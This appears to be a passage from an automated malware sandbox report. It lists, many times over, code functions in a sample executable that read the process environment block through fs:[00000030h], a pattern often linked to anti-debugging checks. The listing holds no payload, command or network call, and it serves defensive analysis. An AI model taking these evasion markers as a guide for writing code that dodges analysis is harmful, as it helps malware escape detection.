          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8550 mov eax, dword ptr fs:[00000030h]3_2_019D8550
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A044B0 mov ecx, dword ptr fs:[00000030h]3_2_01A044B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5A4B0 mov eax, dword ptr fs:[00000030h]3_2_01A5A4B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8A49A mov eax, dword ptr fs:[00000030h]3_2_01A8A49A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D64AB mov eax, dword ptr fs:[00000030h]3_2_019D64AB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D04E5 mov ecx, dword ptr fs:[00000030h]3_2_019D04E5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56420 mov eax, dword ptr fs:[00000030h]3_2_01A56420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A430 mov eax, dword ptr fs:[00000030h]3_2_01A0A430
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08402 mov eax, dword ptr fs:[00000030h]3_2_01A08402
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CC427 mov eax, dword ptr fs:[00000030h]3_2_019CC427
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE420 mov eax, dword ptr fs:[00000030h]3_2_019CE420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C645D mov eax, dword ptr fs:[00000030h]3_2_019C645D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F245A mov eax, dword ptr fs:[00000030h]3_2_019F245A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C460 mov ecx, dword ptr fs:[00000030h]3_2_01A5C460
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E443 mov eax, dword ptr fs:[00000030h]3_2_01A0E443
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]3_2_019FA470
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]3_2_019FA470
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FA470 mov eax, dword ptr fs:[00000030h]3_2_019FA470
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8A456 mov eax, dword ptr fs:[00000030h]3_2_01A8A456
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A847A0 mov eax, dword ptr fs:[00000030h]3_2_01A847A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7678E mov eax, dword ptr fs:[00000030h]3_2_01A7678E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D07AF mov eax, dword ptr fs:[00000030h]3_2_019D07AF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5E7E1 mov eax, dword ptr fs:[00000030h]3_2_01A5E7E1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DC7C0 mov eax, dword ptr fs:[00000030h]3_2_019DC7C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A507C3 mov eax, dword ptr fs:[00000030h]3_2_01A507C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D47FB mov eax, dword ptr fs:[00000030h]3_2_019D47FB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D47FB mov eax, dword ptr fs:[00000030h]3_2_019D47FB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]3_2_019F27ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]3_2_019F27ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F27ED mov eax, dword ptr fs:[00000030h]3_2_019F27ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C720 mov eax, dword ptr fs:[00000030h]3_2_01A0C720
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C720 mov eax, dword ptr fs:[00000030h]3_2_01A0C720
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0710 mov eax, dword ptr fs:[00000030h]3_2_019D0710
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4C730 mov eax, dword ptr fs:[00000030h]3_2_01A4C730
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0273C mov eax, dword ptr fs:[00000030h]3_2_01A0273C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0273C mov ecx, dword ptr fs:[00000030h]3_2_01A0273C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0273C mov eax, dword ptr fs:[00000030h]3_2_01A0273C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C700 mov eax, dword ptr fs:[00000030h]3_2_01A0C700
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A00710 mov eax, dword ptr fs:[00000030h]3_2_01A00710
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0750 mov eax, dword ptr fs:[00000030h]3_2_019D0750
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0674D mov esi, dword ptr fs:[00000030h]3_2_01A0674D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0674D mov eax, dword ptr fs:[00000030h]3_2_01A0674D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0674D mov eax, dword ptr fs:[00000030h]3_2_01A0674D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8770 mov eax, dword ptr fs:[00000030h]3_2_019D8770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0770 mov eax, dword ptr fs:[00000030h]3_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A54755 mov eax, dword ptr fs:[00000030h]3_2_01A54755
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12750 mov eax, dword ptr fs:[00000030h]3_2_01A12750
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12750 mov eax, dword ptr fs:[00000030h]3_2_01A12750
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5E75D mov eax, dword ptr fs:[00000030h]3_2_01A5E75D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C6A6 mov eax, dword ptr fs:[00000030h]3_2_01A0C6A6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4690 mov eax, dword ptr fs:[00000030h]3_2_019D4690
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4690 mov eax, dword ptr fs:[00000030h]3_2_019D4690
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A066B0 mov eax, dword ptr fs:[00000030h]3_2_01A066B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A506F1 mov eax, dword ptr fs:[00000030h]3_2_01A506F1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A506F1 mov eax, dword ptr fs:[00000030h]3_2_01A506F1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A4E6F2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A4E6F2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A4E6F2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A4E6F2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h]3_2_01A0A6C7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A6C7 mov eax, dword ptr fs:[00000030h]3_2_01A0A6C7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A06620 mov eax, dword ptr fs:[00000030h]3_2_01A06620
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08620 mov eax, dword ptr fs:[00000030h]3_2_01A08620
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]3_2_019E260B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E609 mov eax, dword ptr fs:[00000030h]3_2_01A4E609
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D262C mov eax, dword ptr fs:[00000030h]3_2_019D262C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12619 mov eax, dword ptr fs:[00000030h]3_2_01A12619
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EE627 mov eax, dword ptr fs:[00000030h]3_2_019EE627
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A660 mov eax, dword ptr fs:[00000030h]3_2_01A0A660
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A660 mov eax, dword ptr fs:[00000030h]3_2_01A0A660
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9866E mov eax, dword ptr fs:[00000030h]3_2_01A9866E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9866E mov eax, dword ptr fs:[00000030h]3_2_01A9866E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A02674 mov eax, dword ptr fs:[00000030h]3_2_01A02674
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EC640 mov eax, dword ptr fs:[00000030h]3_2_019EC640
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A589B3 mov esi, dword ptr fs:[00000030h]3_2_01A589B3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A589B3 mov eax, dword ptr fs:[00000030h]3_2_01A589B3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A589B3 mov eax, dword ptr fs:[00000030h]3_2_01A589B3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D09AD mov eax, dword ptr fs:[00000030h]3_2_019D09AD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D09AD mov eax, dword ptr fs:[00000030h]3_2_019D09AD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]3_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5E9E0 mov eax, dword ptr fs:[00000030h]3_2_01A5E9E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]3_2_019DA9D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A029F9 mov eax, dword ptr fs:[00000030h]3_2_01A029F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A029F9 mov eax, dword ptr fs:[00000030h]3_2_01A029F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A669C0 mov eax, dword ptr fs:[00000030h]3_2_01A669C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A049D0 mov eax, dword ptr fs:[00000030h]3_2_01A049D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9A9D3 mov eax, dword ptr fs:[00000030h]3_2_01A9A9D3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8918 mov eax, dword ptr fs:[00000030h]3_2_019C8918
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8918 mov eax, dword ptr fs:[00000030h]3_2_019C8918
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A6892B mov eax, dword ptr fs:[00000030h]3_2_01A6892B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5892A mov eax, dword ptr fs:[00000030h]3_2_01A5892A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E908 mov eax, dword ptr fs:[00000030h]3_2_01A4E908
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4E908 mov eax, dword ptr fs:[00000030h]3_2_01A4E908
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C912 mov eax, dword ptr fs:[00000030h]3_2_01A5C912
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A1096E mov eax, dword ptr fs:[00000030h]3_2_01A1096E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A1096E mov edx, dword ptr fs:[00000030h]3_2_01A1096E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A1096E mov eax, dword ptr fs:[00000030h]3_2_01A1096E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C97C mov eax, dword ptr fs:[00000030h]3_2_01A5C97C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A74978 mov eax, dword ptr fs:[00000030h]3_2_01A74978
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A74978 mov eax, dword ptr fs:[00000030h]3_2_01A74978
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A50946 mov eax, dword ptr fs:[00000030h]3_2_01A50946
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4940 mov eax, dword ptr fs:[00000030h]3_2_01AA4940
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]3_2_019F6962
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]3_2_019F6962
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]3_2_019F6962
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0887 mov eax, dword ptr fs:[00000030h]3_2_019D0887
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C89D mov eax, dword ptr fs:[00000030h]3_2_01A5C89D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9A8E4 mov eax, dword ptr fs:[00000030h]3_2_01A9A8E4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]3_2_01A0C8F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]3_2_01A0C8F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FE8C0 mov eax, dword ptr fs:[00000030h]3_2_019FE8C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA08C0 mov eax, dword ptr fs:[00000030h]3_2_01AA08C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A830 mov eax, dword ptr fs:[00000030h]3_2_01A0A830
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7483A mov eax, dword ptr fs:[00000030h]3_2_01A7483A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7483A mov eax, dword ptr fs:[00000030h]3_2_01A7483A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov ecx, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]3_2_019F2835
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5C810 mov eax, dword ptr fs:[00000030h]3_2_01A5C810
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4859 mov eax, dword ptr fs:[00000030h]3_2_019D4859
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D4859 mov eax, dword ptr fs:[00000030h]3_2_019D4859
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A66870 mov eax, dword ptr fs:[00000030h]3_2_01A66870
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A66870 mov eax, dword ptr fs:[00000030h]3_2_01A66870
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5E872 mov eax, dword ptr fs:[00000030h]3_2_01A5E872
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5E872 mov eax, dword ptr fs:[00000030h]3_2_01A5E872
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E2840 mov ecx, dword ptr fs:[00000030h]3_2_019E2840
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A00854 mov eax, dword ptr fs:[00000030h]3_2_01A00854
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A84BB0 mov eax, dword ptr fs:[00000030h]3_2_01A84BB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A84BB0 mov eax, dword ptr fs:[00000030h]3_2_01A84BB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0BBE mov eax, dword ptr fs:[00000030h]3_2_019E0BBE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0BBE mov eax, dword ptr fs:[00000030h]3_2_019E0BBE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]3_2_019D0BCD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]3_2_019D0BCD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]3_2_019D0BCD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]3_2_019F0BCB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]3_2_019F0BCB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]3_2_019F0BCB
